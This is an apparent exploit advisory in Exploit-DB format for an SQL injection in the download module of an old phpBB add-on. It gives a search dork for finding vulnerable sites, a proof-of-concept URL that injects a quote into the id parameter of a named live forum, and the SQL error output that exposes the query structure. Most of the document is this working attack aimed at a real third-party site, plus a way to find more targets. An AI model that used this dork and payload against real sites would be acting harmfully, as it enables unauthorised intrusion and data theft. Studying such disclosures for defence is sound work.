/$$ /$$$$$$$ /$$$$$$$ | $$ | $$__ $$| $$__ $$ /$$$$$$ | $$$$$$$ /$$$$$$ | $$ \ $$| $$ \ $$ /$$__ $$| $$__ $$ /$$__ $$| $$$$$$$ | $$$$$$$ | $$ \ $$| $$ \ $$| $$ \ $$| $$__ $$| $$__ $$ | $$ | $$| $$ | $$| $$ | $$| $$ \ $$| $$ \ $$ | $$$$$$$/| $$ | $$| $$$$$$$/| $$$$$$$/| $$$$$$$/ | $$____/ |__/ |__/| $$____/ |_______/ |_______/ phpBB © 2003 | $$ | $$ | $$ | $$ |__/ |__/ # Exploit Title: phpBB SQLi # Date: 12/05/2023 # Exploit Author: Emiliano Febbi # Vendor Homepage: ??? # Software Link: Google # Version: phpBB © 2003 # Tested on: Windows 10 # CMS: phpBB # Dork:dload.php?action= # Vulnz: SQLi *PoC* [code] ######################################################### #http://motyle.info/forum/dload.php?action=file&id*'*=24# <= [*SQLi*] ######################################################### #error: SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND u.user_id = p.poster_id ORDER by p.comments_time ASC' at line 3 SELECT p.*, u.* FROM (phpbb_pa_comments p, phpbb_users u) WHERE p.file_id = AND u.user_id = p.poster_id ORDER by p.comments_time ASC Line : 124 File : comment.php [/code] ._________. */ ///______I ) . /_(_) /__/*PoC End*